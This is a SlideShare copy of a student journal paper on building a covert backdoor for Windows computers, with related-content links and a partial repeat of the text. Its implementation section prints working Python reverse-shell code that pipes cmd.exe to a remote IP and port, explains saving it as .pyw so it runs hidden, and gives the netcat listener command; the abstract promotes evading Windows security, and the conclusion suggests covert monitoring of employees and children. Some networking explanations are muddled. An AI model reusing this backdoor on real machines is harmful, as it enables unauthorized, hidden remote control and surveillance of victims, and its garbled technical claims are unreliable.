SlideShare a Scribd company logo
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1227
Backdoor Entry to a Windows Computer
Ch. Kalpana1, V. Naga Rushikesh2, A. Srikanth3
1Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India
2Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India
3Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India
---------------------------------------------------------------------***---------------------------------------------------------------------
Abstract - On any computer, there aretwoaccesspointsthat
can be used for remote access. One requires usercredentials to
connect while the other accesspointisalsoknownasbackdoor
access point. It allows users to bypass security checks to login.
The backdoor is a simple executable that gets installed on the
target computer to get a reverse shell if needed. There are
several ways to create a backdoor to a computer. A savvy
attacker can easily create a custom backdoor. Most of these
custom backdoors are easily recognized as malicious files by
Windows security system. To solve this problem, we have
developed an advanced backdoor that works like anormal file
but works like a backdoor. Once installed, thebackdoorallows
an attacker to retain access to the computer and make
changes to it. Initially, access to the reverse shell obtained
through the backdoor will have user privileges, and privilege
escalation methods are used to access an administrator
privilege shell. It is used to remotely access a computer using
an RCE (Remote Code Execution) vulnerability.
Key Words: Privileges, Access, Intruder, Remote Code
Execution, Vulnerability
1.INTRODUCTION
A backdoor is a method used by anyone (hackers,
governments, computer scientists, etc.). - Allow remote
access to your device without your permission or
knowledge. Hackers can install backdoors on your deviceby
using malware, exploitingvulnerabilitiesinyoursoftware,or
even installing backdoors directly into your device's
hardware/firmware. Once a hacker has logged into your
machine without your knowledge, they can use a backdoor
for a variety of reasons, such as:
• Surveillance
• Data theft
• Cryptojacking
• Sabotage
• Malware attack.
No one is safe from backdoor hacking, hackersareconstantly
inventing new methods and new malicious files to gain
access to users.
2. HOW DOES A BACKDOOR WORKS?
Every computer system has an official means throughwhich
users can access it. This typically includes an authentication
system where users provide a password or some other type
of credential to prove their identity. If a user authenticates
successfully, they gain access to the system, but their
permissions are limited to those assigned to their account.If
this authentication system provides security, it can also
inconvenience certain users, whether legitimate or
illegitimate. System administrators may need to access
systems remotely that do not allow remote access. An
attacker may want to access a company's database server
even if he does not have the necessary credentials to do so.
System builders can include a default account to simplify
setup, testing, and deploying system updates. In these cases,
a backdoor can be inserted into the system. For example, a
system administrator can configure a web shell on a server.
When they want to access a server,theyvisittheappropriate
website and can send commands directly to the server
without authenticating or configuring company security
policies to accept secure remote access protocols such as
SSH.
Fig-1: System Architecture
3. TYPES OF BACKDOOR
Backdoors can take many forms. Some of the more common
types include:
Trojans: Most backdoor malware is designed to bypass an
organization's defenses,allowingattackerstogaina foothold
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1228
in corporate systems. As such, they are often Trojans that
masquerade as benign or desired files while containing
malicious functionality, such as enabling remote access to
the infected computer.
Built-in backdoors: Device manufacturers may include
backdoors in the form of default accounts, undocumented
remote access systems, and similar functionality. Although
these systems are usuallyonlyavailabletothemanufacturer,
they are usually designed in such a way that they cannot be
disabled and there is no backdoor to keep them secret
forever, exposing these security holes to attackers.
Web Shell: A Web Shell is a web page designed to receive
user input and run in a system terminal. These backdoors
are often installed by system and network administrators to
facilitate remote access and management of corporate
systems.
Supply Chain Exploits: Web applications and other
software often contain third-party libraries and code. An
attacker could embed backdoor code into a library in the
hope that it will be used in a corporateapplication,providing
backdoor access to the system running the software.
Fig-2
4. SCOPE AND OVERVIEW
The project aims to create complete applications that can be
used in a corporate environment. The application should be
as simple as possible so that even a non-technical person can
configure it. In this project, we use pythonprogrammingand
use Socket, os and subprocess modules to implement the
application. It's easy to understand.
A backdoor is any means by which anyone can gain accessto
a system by bypassing normal security measures. Some
software often has backdoors built into its code, allowing
engineers and developers to bypass their own defenses to
solve user problems. Backdoor attacks involve
cybercriminals using these access points to gain
unauthorized access to data and systems. These incidents
often go unnoticed, at least initially, because hackers don't
have to compromise or force their way through network
security systems. Once they gain remote access toa network
or device, criminals can install malware, steal data, and
monitor user activity.
Fig-3
5. PROPOSED SYSTEM
In the proposed system, we have used modules such as os,
subprocess, socket, etc., through whichwecanfill thegapsin
the existing system. Now in the proposed system we can
modify the contents of the file, and in the proposed system
the user/hacker information is also exposed. It is difficult to
know who the hacker is. Network commands such as
ipconfig, netsh are now also available in the proposed
system.
6. EXISTING SYSTEM
Backdoor access is nothing but access to target system and
ability to perform any action in target system via user
command prompt. But in the existing system, we can
view/read but not modify the contents of specific files
through the backdoor, and in the existing system, we cannot
access network commands such as ipconfig, netsh, etc.
Existing systems do not meet all hacker/administrator
requirements.
REVERSE TCP CONNECTION
Reverse TCP connection TCP/IP or Transmission
Control Protocol/Internet Protocol is the basic
communication language of the Internet. The Internet uses
TCP/IP to allow a computer to communicate with another
computer over the Internet by assembling packets of data
and sending them to the correct location. A basic firewall is
used to block incoming connections. Reverse_tcp is where
the attacker forces the host to establish a connection with
the attacker. This is the basic idea of a reverse_tcp.
TCP
TCP/IP has 2 layers, TCP is responsible for taking the big
data and assembling it into network packets and sending it
to receive by another TCP layer which decodes the packets
and breaks it down into changes of information useful.
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1229
IP
IP or Internet Protocol is responsible for routing the
assembled network packets to their intended location. The
IP layer is like GPS for packets.
THIS ATTACK USES 2 BASIC CONCEPTS
BIND SHELL: This is a shell where the target machine opens
a communication port or listener on the victim machine and
waits for incoming connections. The attacker then connects
to the victim machine's listener and issues the commands.
REVERSE SHELL: This is a shell in which the target machine
initiates a connectiontotheattackingmachine.Theattacking
machine has a listening port that accepts connections, the
use of which can lead to the execution of code or command.
7. REQUIREMENTS
FUNCTIONAL REQUIREMENTS:
Windows systems must be able to connect to remote
computers over the Internet by sending CONNECT signals
Linux systems must be able to receive CONNECT signals
from remote computers and establish secure connections.
PERFORMANCE REQUIREMENTS:
 System must be in recent Version.
 Robust and Scalability
SOFTWARE REQUIREMENTS:
 Windows 7
 Python 3
 Linux OS
 Netcat tool
HARDWARE REQUIREMENTS
 2 computers with i5 processors
 8gb RAM
 10 GB free space
8. FEASIBILITY STUDY
OPERATIONAL FEASIBILITY:
The proposed system is advantageous because it turns into
an information system capable of analyzing flows to meet
the operational needs of the organization. In terms of
security, the file is transferred to the destination and a
confirmation is issued to the server. Bulk data transfers are
sent without traffic.
TECHNICAL FEASIBILITY:
Technical feasibility focuses on existing computer systems
(hardware, software, etc...) and the extent to which it can
support the proposed addition. For example, if the current
computer is running at 80% capacity. This involves
additional hardware (RAM and 6 6 processors) which will
increase the speed of the process. On the software side, the
opensource PYTHON language is used. We can also use the
Linux operating system. The technical requirement of this
project is Socket module in python, software and normal
hardware configuration is enough, so the system is more
feasible on these standards.
ECONOMIC FEASIBILITY:
Economic feasibility is the most common method used to
assess the effectiveness of candidate systems.Oftenreferred
to as a cost/benefit analysis, the process involves
determining the candidate's expected benefits and savings
and comparing them to the costs.Ifthebenefitsoutweigh the
costs. Then decide to design and implement the system.
Otherwise, exit the system. The implementation of the
system makes it useful for analyzing traffic. Therefore, its
implementation does not require any additional equipment
or materials. Therefore, its use is economically feasible.
9. MODULES AND SYSTEM DESIGN
Fig-4
SOCKET MODULE:
Socket programming is a methodofconnectingtwonodes on
a network to communicate with each other. A socket (node)
listens on a specific IP port, while another socket contacts
other sockets to establish connections. When a client
connects to a server, the server forms a listening socket.
They are the real backbone of web browsing. Simply put,
there is a server and a client. Socket programming starts
with importing the socket library and creating a simple
socket. import
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1230
sockets=socket.socket(socket.AF_INET,socket.SOCK_STREA
M)
Here we create a socket instance and passittwo parameters.
The first parameter is AF_INET and the second is
SOCK_STREAM. AF_INET refers to the ipv4 address family.
SOCK_STREAM indicates a connection-oriented TCP
protocol. We can now use this socket to connect to the
server.
THREADING:
The "thread" module provides simple functionality and
provides a higher-level interface into the threading module,
which should be used. The first thing you need to do is
import Thread by typing: from threadingimportThread The
threading module, as mentioned earlier, has a Thread class
to implement threads, which also contains a predefined
method in multithreaded programming. They are:
 run(): as thread input
 start(): used to start a thread by calling run()
 isAlive(): used to check if there is output
 getName(): used for return a The thread name
 setName(): used to set the thread name
OS MODULE:
The Python OS module facilitates the interaction between
the user and the operating system to build the system. It
provides many useful operating system functions, used to
perform operating system-based tasks and obtain relevant
information about the operating system. The operating
system is part of Python's standard utility modules. This
module provides a portable way to use operating system
dependent functions.os.name () - Provides the name of the
OS system module it imports.
 os.mkdir() – used to create a new directory
 os.getcwd() – returns thecurrentworkingdirectory
 os.chdir() - changes the current working directory
 os.rmdir() - removes the specified directory an
absolute or relative path
 os.popen() - opens a file or specified from the
command it returns an object of return file
connected to the pipe.
 os.close() - closes the file associated with the
descriptor fr.
SUBPROCESS MODULE:
The subprocess module present in Python (2.x and 3.x) is
used to run new applications or programs through Python
code by creating new processes. It also helps to get
entry/exit/error channels and exit codes from various
commands. To start a new process, or in other words, a new
sub-process in Python, you need to use the Popen function
call. Two parameters can be passed in the function call. The
first parameter is the program you want to start and the
second is the file parameter. In the following example, you
will use the Unix cat command with example.py as two
arguments. The cat command, short for "concatenate", is
widely used in Linux and Unix programming. Like "cat
example.py". You can start any program unless you didn't
create it.
10. ALGORITHMS USED
REVERSE TCP ATTACK:
When a host initiates a connection, we call it a forwarded
connection. But otherwise, the server initiates a connection
to the host, which we call a reverse connection (rare). A
firewall works by blocking all incoming connections. Thus,
all incoming connections (reverse connections) are blocked
by the firewall. However, if the host initiates the connection
(a forward connection), it is allowed, and a host-initiated
return connection is allowed.
Fig-5: Reverse TCP
Basically, it is not the attacker who initiates a connection,
which of course would be blocked by the firewall, but the
device which initiates a connection to the attacker, which
would be allowed by the firewall.fire,thentheattackertakes
control of the device and goes through work. It is a type of
reverse shell.
Fig-6
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1231
11. CODE AND IMPLEMENTATION
Fig-7: Code
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.114",4444))
p=subprocess.Popen(["windowssystem32cmd.exe"],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
It is necessary to have two Windows workstationsandLinux
machines to set up this project. First create a python file and
write the above script and save it with .pyw extension,it will
run the python file in the background. Now thesystemstarts
sending connection packets to the above IP address through
the above port number. Now run the followingcommand on
the Linux machine
nc -nlvp 4444
This command uses the netcat tool to listen for any
connection on port number 4444. If either machine sends a
connection to the Linux machine, it will easily accept it and
establish a connection between the two machines. The
reverse TCP connection is established successfully, and the
Windows system commandpromptisdisplayedontheLinux
machine with user rights.
12. OUTPUTS
Fig-8: Output-1
Fig-9: Output-2
International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056
Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072
© 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1232
13. CONCLUSION
The technical advantage of backdoors is the ability to
monitor remote systems. It is most likely to be used by
software companies who can monitor employee computers
to improve productivity. Parental monitoringisalsopossible
with this backdoor software. Firewalls cannot detect
backdoors as malware, so Windows computersprotected by
firewalls are extremely vulnerable to backdoors that can be
easily exploited and gain remote access. This backdoor has
positive and negative uses. Some negative ways of using a
backdoor are to establish a connectiontoa computerthat we
do not have access to. The backdoors we created are for
educational purposes only and cannot be used foranyillegal
purpose.
REFERENCES
[1] Eman Esmaeel Hamed and Muna Majeed lafta,
"Intrusion WindowsXP byBackdoorTool",Journal ofAl-
NahrainUniversity,Vol.11(3),December,2008M. Young,
The Technical Writer’s Handbook. Mill Valley, CA:
University Science, 1989.
[2] Chris Wysopal and Chris Eng, "Static Detection of
Application of Backdoors", Veracode Inc.
[3] Exploring windows back door – bypassing firewall on
webhosting providers
https://dl.packetstormsecurity.net/papers/general/my
_research1.pdf

More Related Content

PPTX
Firewalls
PDF
OWASP Top 10 Web Attacks (2017) with Prevention Methods
PPTX
Introduction to penetration testing
PDF
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
PPS
Workshop on BackTrack live CD
PPT
Kunal - Introduction to backtrack - ClubHack2008
PPT
Kunal - Introduction to BackTrack - ClubHack2008
PPTX
Network security
Firewalls
OWASP Top 10 Web Attacks (2017) with Prevention Methods
Introduction to penetration testing
Security Holes and Vulnerabilities in Corporate Network_Pre Null Meet Kolkata
Workshop on BackTrack live CD
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
Network security

Similar to Backdoor Entry to a Windows Computer (20)

PDF
Remotely Scanning Organization’s Internal Network
PDF
Ii2514901494
PDF
IRJET- Sandbox Technology
PDF
VTU network security(10 ec832) unit 6 notes
PPTX
Security Threats and Vulnerabilities-2.pptx
PDF
43 automatic
PDF
01_Metasploit - The Elixir of Network Security
PPT
Internet of things , presentation, rajiv gandhi university
PPTX
Cryptography and system security
PPT
Day4
PPTX
Final project.ppt
PDF
Module 7 (sniffers)
PDF
Exploits Attack on Windows Vulnerabilities
PPT
Presentation Prepared By: Mohamad Almajali
PDF
PDF
Malware freak show
PDF
Protecting location privacy in sensor networks against a global eavesdropper
PDF
Protecting location privacy in sensor networks against a global eavesdropper
PPTX
Network security
DOCX
Network and web security
Remotely Scanning Organization’s Internal Network
Ii2514901494
IRJET- Sandbox Technology
VTU network security(10 ec832) unit 6 notes
Security Threats and Vulnerabilities-2.pptx
43 automatic
01_Metasploit - The Elixir of Network Security
Internet of things , presentation, rajiv gandhi university
Cryptography and system security
Day4
Final project.ppt
Module 7 (sniffers)
Exploits Attack on Windows Vulnerabilities
Presentation Prepared By: Mohamad Almajali
Malware freak show
Protecting location privacy in sensor networks against a global eavesdropper
Protecting location privacy in sensor networks against a global eavesdropper
Network security
Network and web security
Ad

More from IRJET Journal (20)

PDF
Enhanced heart disease prediction using SKNDGR ensemble Machine Learning Model
PDF
Utilizing Biomedical Waste for Sustainable Brick Manufacturing: A Novel Appro...
PDF
Kiona – A Smart Society Automation Project
PDF
DESIGN AND DEVELOPMENT OF BATTERY THERMAL MANAGEMENT SYSTEM USING PHASE CHANG...
PDF
Invest in Innovation: Empowering Ideas through Blockchain Based Crowdfunding
PDF
SPACE WATCH YOUR REAL-TIME SPACE INFORMATION HUB
PDF
A Review on Influence of Fluid Viscous Damper on The Behaviour of Multi-store...
PDF
Wireless Arduino Control via Mobile: Eliminating the Need for a Dedicated Wir...
PDF
Explainable AI(XAI) using LIME and Disease Detection in Mango Leaf by Transfe...
PDF
BRAIN TUMOUR DETECTION AND CLASSIFICATION
PDF
The Project Manager as an ambassador of the contract. The case of NEC4 ECC co...
PDF
"Enhanced Heat Transfer Performance in Shell and Tube Heat Exchangers: A CFD ...
PDF
Advancements in CFD Analysis of Shell and Tube Heat Exchangers with Nanofluid...
PDF
Breast Cancer Detection using Computer Vision
PDF
Auto-Charging E-Vehicle with its battery Management.
PDF
Analysis of high energy charge particle in the Heliosphere
PDF
A Novel System for Recommending Agricultural Crops Using Machine Learning App...
PDF
Auto-Charging E-Vehicle with its battery Management.
PDF
Analysis of high energy charge particle in the Heliosphere
PDF
Wireless Arduino Control via Mobile: Eliminating the Need for a Dedicated Wir...
Enhanced heart disease prediction using SKNDGR ensemble Machine Learning Model
Utilizing Biomedical Waste for Sustainable Brick Manufacturing: A Novel Appro...
Kiona – A Smart Society Automation Project
DESIGN AND DEVELOPMENT OF BATTERY THERMAL MANAGEMENT SYSTEM USING PHASE CHANG...
Invest in Innovation: Empowering Ideas through Blockchain Based Crowdfunding
SPACE WATCH YOUR REAL-TIME SPACE INFORMATION HUB
A Review on Influence of Fluid Viscous Damper on The Behaviour of Multi-store...
Wireless Arduino Control via Mobile: Eliminating the Need for a Dedicated Wir...
Explainable AI(XAI) using LIME and Disease Detection in Mango Leaf by Transfe...
BRAIN TUMOUR DETECTION AND CLASSIFICATION
The Project Manager as an ambassador of the contract. The case of NEC4 ECC co...
"Enhanced Heat Transfer Performance in Shell and Tube Heat Exchangers: A CFD ...
Advancements in CFD Analysis of Shell and Tube Heat Exchangers with Nanofluid...
Breast Cancer Detection using Computer Vision
Auto-Charging E-Vehicle with its battery Management.
Analysis of high energy charge particle in the Heliosphere
A Novel System for Recommending Agricultural Crops Using Machine Learning App...
Auto-Charging E-Vehicle with its battery Management.
Analysis of high energy charge particle in the Heliosphere
Wireless Arduino Control via Mobile: Eliminating the Need for a Dedicated Wir...
Ad

Recently uploaded (20)

PPTX
UNIT-1 - COAL BASED THERMAL POWER PLANTS
PDF
The CXO Playbook 2025 – Future-Ready Strategies for C-Suite Leaders Cerebrai...
PDF
PPT on Performance Review to get promotions
PPTX
Construction Project Organization Group 2.pptx
PPT
CRASH COURSE IN ALTERNATIVE PLUMBING CLASS
PPTX
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
PPTX
CARTOGRAPHY AND GEOINFORMATION VISUALIZATION chapter1 NPTE (2).pptx
PPTX
IOT PPTs Week 10 Lecture Material.pptx of NPTEL Smart Cities contd
PDF
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
DOCX
ASol_English-Language-Literature-Set-1-27-02-2023-converted.docx
PPTX
M Tech Sem 1 Civil Engineering Environmental Sciences.pptx
PPTX
OOP with Java - Java Introduction (Basics)
PDF
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
DOCX
573137875-Attendance-Management-System-original
PPTX
MCN 401 KTU-2019-PPE KITS-MODULE 2.pptx
PDF
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
PPTX
web development for engineering and engineering
PPTX
UNIT 4 Total Quality Management .pptx
PPT
Mechanical Engineering MATERIALS Selection
PPTX
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx
UNIT-1 - COAL BASED THERMAL POWER PLANTS
The CXO Playbook 2025 – Future-Ready Strategies for C-Suite Leaders Cerebrai...
PPT on Performance Review to get promotions
Construction Project Organization Group 2.pptx
CRASH COURSE IN ALTERNATIVE PLUMBING CLASS
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
CARTOGRAPHY AND GEOINFORMATION VISUALIZATION chapter1 NPTE (2).pptx
IOT PPTs Week 10 Lecture Material.pptx of NPTEL Smart Cities contd
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
ASol_English-Language-Literature-Set-1-27-02-2023-converted.docx
M Tech Sem 1 Civil Engineering Environmental Sciences.pptx
OOP with Java - Java Introduction (Basics)
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
573137875-Attendance-Management-System-original
MCN 401 KTU-2019-PPE KITS-MODULE 2.pptx
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
web development for engineering and engineering
UNIT 4 Total Quality Management .pptx
Mechanical Engineering MATERIALS Selection
Engineering Ethics, Safety and Environment [Autosaved] (1).pptx

Backdoor Entry to a Windows Computer

  • 1. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1227 Backdoor Entry to a Windows Computer Ch. Kalpana1, V. Naga Rushikesh2, A. Srikanth3 1Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India 2Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India 3Student, Dept. of CSE, Sreenidhi Institute of Science and Technology, Telangana, India ---------------------------------------------------------------------***--------------------------------------------------------------------- Abstract - On any computer, there aretwoaccesspointsthat can be used for remote access. One requires usercredentials to connect while the other accesspointisalsoknownasbackdoor access point. It allows users to bypass security checks to login. The backdoor is a simple executable that gets installed on the target computer to get a reverse shell if needed. There are several ways to create a backdoor to a computer. A savvy attacker can easily create a custom backdoor. Most of these custom backdoors are easily recognized as malicious files by Windows security system. To solve this problem, we have developed an advanced backdoor that works like anormal file but works like a backdoor. Once installed, thebackdoorallows an attacker to retain access to the computer and make changes to it. Initially, access to the reverse shell obtained through the backdoor will have user privileges, and privilege escalation methods are used to access an administrator privilege shell. It is used to remotely access a computer using an RCE (Remote Code Execution) vulnerability. Key Words: Privileges, Access, Intruder, Remote Code Execution, Vulnerability 1.INTRODUCTION A backdoor is a method used by anyone (hackers, governments, computer scientists, etc.). - Allow remote access to your device without your permission or knowledge. Hackers can install backdoors on your deviceby using malware, exploitingvulnerabilitiesinyoursoftware,or even installing backdoors directly into your device's hardware/firmware. Once a hacker has logged into your machine without your knowledge, they can use a backdoor for a variety of reasons, such as: • Surveillance • Data theft • Cryptojacking • Sabotage • Malware attack. No one is safe from backdoor hacking, hackersareconstantly inventing new methods and new malicious files to gain access to users. 2. HOW DOES A BACKDOOR WORKS? Every computer system has an official means throughwhich users can access it. This typically includes an authentication system where users provide a password or some other type of credential to prove their identity. If a user authenticates successfully, they gain access to the system, but their permissions are limited to those assigned to their account.If this authentication system provides security, it can also inconvenience certain users, whether legitimate or illegitimate. System administrators may need to access systems remotely that do not allow remote access. An attacker may want to access a company's database server even if he does not have the necessary credentials to do so. System builders can include a default account to simplify setup, testing, and deploying system updates. In these cases, a backdoor can be inserted into the system. For example, a system administrator can configure a web shell on a server. When they want to access a server,theyvisittheappropriate website and can send commands directly to the server without authenticating or configuring company security policies to accept secure remote access protocols such as SSH. Fig-1: System Architecture 3. TYPES OF BACKDOOR Backdoors can take many forms. Some of the more common types include: Trojans: Most backdoor malware is designed to bypass an organization's defenses,allowingattackerstogaina foothold
  • 2. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1228 in corporate systems. As such, they are often Trojans that masquerade as benign or desired files while containing malicious functionality, such as enabling remote access to the infected computer. Built-in backdoors: Device manufacturers may include backdoors in the form of default accounts, undocumented remote access systems, and similar functionality. Although these systems are usuallyonlyavailabletothemanufacturer, they are usually designed in such a way that they cannot be disabled and there is no backdoor to keep them secret forever, exposing these security holes to attackers. Web Shell: A Web Shell is a web page designed to receive user input and run in a system terminal. These backdoors are often installed by system and network administrators to facilitate remote access and management of corporate systems. Supply Chain Exploits: Web applications and other software often contain third-party libraries and code. An attacker could embed backdoor code into a library in the hope that it will be used in a corporateapplication,providing backdoor access to the system running the software. Fig-2 4. SCOPE AND OVERVIEW The project aims to create complete applications that can be used in a corporate environment. The application should be as simple as possible so that even a non-technical person can configure it. In this project, we use pythonprogrammingand use Socket, os and subprocess modules to implement the application. It's easy to understand. A backdoor is any means by which anyone can gain accessto a system by bypassing normal security measures. Some software often has backdoors built into its code, allowing engineers and developers to bypass their own defenses to solve user problems. Backdoor attacks involve cybercriminals using these access points to gain unauthorized access to data and systems. These incidents often go unnoticed, at least initially, because hackers don't have to compromise or force their way through network security systems. Once they gain remote access toa network or device, criminals can install malware, steal data, and monitor user activity. Fig-3 5. PROPOSED SYSTEM In the proposed system, we have used modules such as os, subprocess, socket, etc., through whichwecanfill thegapsin the existing system. Now in the proposed system we can modify the contents of the file, and in the proposed system the user/hacker information is also exposed. It is difficult to know who the hacker is. Network commands such as ipconfig, netsh are now also available in the proposed system. 6. EXISTING SYSTEM Backdoor access is nothing but access to target system and ability to perform any action in target system via user command prompt. But in the existing system, we can view/read but not modify the contents of specific files through the backdoor, and in the existing system, we cannot access network commands such as ipconfig, netsh, etc. Existing systems do not meet all hacker/administrator requirements. REVERSE TCP CONNECTION Reverse TCP connection TCP/IP or Transmission Control Protocol/Internet Protocol is the basic communication language of the Internet. The Internet uses TCP/IP to allow a computer to communicate with another computer over the Internet by assembling packets of data and sending them to the correct location. A basic firewall is used to block incoming connections. Reverse_tcp is where the attacker forces the host to establish a connection with the attacker. This is the basic idea of a reverse_tcp. TCP TCP/IP has 2 layers, TCP is responsible for taking the big data and assembling it into network packets and sending it to receive by another TCP layer which decodes the packets and breaks it down into changes of information useful.
  • 3. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1229 IP IP or Internet Protocol is responsible for routing the assembled network packets to their intended location. The IP layer is like GPS for packets. THIS ATTACK USES 2 BASIC CONCEPTS BIND SHELL: This is a shell where the target machine opens a communication port or listener on the victim machine and waits for incoming connections. The attacker then connects to the victim machine's listener and issues the commands. REVERSE SHELL: This is a shell in which the target machine initiates a connectiontotheattackingmachine.Theattacking machine has a listening port that accepts connections, the use of which can lead to the execution of code or command. 7. REQUIREMENTS FUNCTIONAL REQUIREMENTS: Windows systems must be able to connect to remote computers over the Internet by sending CONNECT signals Linux systems must be able to receive CONNECT signals from remote computers and establish secure connections. PERFORMANCE REQUIREMENTS:  System must be in recent Version.  Robust and Scalability SOFTWARE REQUIREMENTS:  Windows 7  Python 3  Linux OS  Netcat tool HARDWARE REQUIREMENTS  2 computers with i5 processors  8gb RAM  10 GB free space 8. FEASIBILITY STUDY OPERATIONAL FEASIBILITY: The proposed system is advantageous because it turns into an information system capable of analyzing flows to meet the operational needs of the organization. In terms of security, the file is transferred to the destination and a confirmation is issued to the server. Bulk data transfers are sent without traffic. TECHNICAL FEASIBILITY: Technical feasibility focuses on existing computer systems (hardware, software, etc...) and the extent to which it can support the proposed addition. For example, if the current computer is running at 80% capacity. This involves additional hardware (RAM and 6 6 processors) which will increase the speed of the process. On the software side, the opensource PYTHON language is used. We can also use the Linux operating system. The technical requirement of this project is Socket module in python, software and normal hardware configuration is enough, so the system is more feasible on these standards. ECONOMIC FEASIBILITY: Economic feasibility is the most common method used to assess the effectiveness of candidate systems.Oftenreferred to as a cost/benefit analysis, the process involves determining the candidate's expected benefits and savings and comparing them to the costs.Ifthebenefitsoutweigh the costs. Then decide to design and implement the system. Otherwise, exit the system. The implementation of the system makes it useful for analyzing traffic. Therefore, its implementation does not require any additional equipment or materials. Therefore, its use is economically feasible. 9. MODULES AND SYSTEM DESIGN Fig-4 SOCKET MODULE: Socket programming is a methodofconnectingtwonodes on a network to communicate with each other. A socket (node) listens on a specific IP port, while another socket contacts other sockets to establish connections. When a client connects to a server, the server forms a listening socket. They are the real backbone of web browsing. Simply put, there is a server and a client. Socket programming starts with importing the socket library and creating a simple socket. import
  • 4. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 10 Issue: 03 | Mar 2023 www.irjet.net p-ISSN: 2395-0072 © 2023, IRJET | Impact Factor value: 8.226 | ISO 9001:2008 Certified Journal | Page 1230 sockets=socket.socket(socket.AF_INET,socket.SOCK_STREA M) Here we create a socket instance and passittwo parameters. The first parameter is AF_INET and the second is SOCK_STREAM. AF_INET refers to the ipv4 address family. SOCK_STREAM indicates a connection-oriented TCP protocol. We can now use this socket to connect to the server. THREADING: The "thread" module provides simple functionality and provides a higher-level interface into the threading module, which should be used. The first thing you need to do is import Thread by typing: from threadingimportThread The threading module, as mentioned earlier, has a Thread class to implement threads, which also contains a predefined method in multithreaded programming. They are:  run(): as thread input  start(): used to start a thread by calling run()  isAlive(): used to check if there is output  getName(): used for return a The thread name  setName(): used to set the thread name OS MODULE: The Python OS module facilitates the interaction between the user and the operating system to build the system. It provides many useful operating system functions, used to perform operating system-based tasks and obtain relevant information about the operating system. The operating system is part of Python's standard utility modules. This module provides a portable way to use operating system dependent functions.os.name () - Provides the name of the OS system module it imports.  os.mkdir() – used to create a new directory  os.getcwd() – returns thecurrentworkingdirectory  os.chdir() - changes the current working directory  os.rmdir() - removes the specified directory an absolute or relative path  os.popen() - opens a file or specified from the command it returns an object of return file connected to the pipe.  os.close() - closes the file associated with the descriptor fr. SUBPROCESS MODULE: The subprocess module present in Python (2.x and 3.x) is used to run new applications or programs through Python code by creating new processes. It also helps to get entry/exit/error channels and exit codes from various commands. To start a new process, or in other words, a new sub-process in Python, you need to use the Popen function call. Two parameters can be passed in the function call. The first parameter is the program you want to start and the second is the file parameter. In the following example, you will use the Unix cat command with example.py as two arguments. The cat command, short for "concatenate", is widely used in Linux and Unix programming. Like "cat example.py". You can start any program unless you didn't create it. 10. ALGORITHMS USED REVERSE TCP ATTACK: When a host initiates a connection, we call it a forwarded connection. But otherwise, the server initiates a connection to the host, which we call a reverse connection (rare). A firewall works by blocking all incoming connections. Thus, all incoming connections (reverse connections) are blocked by the firewall. However, if the host initiates the connection (a forward 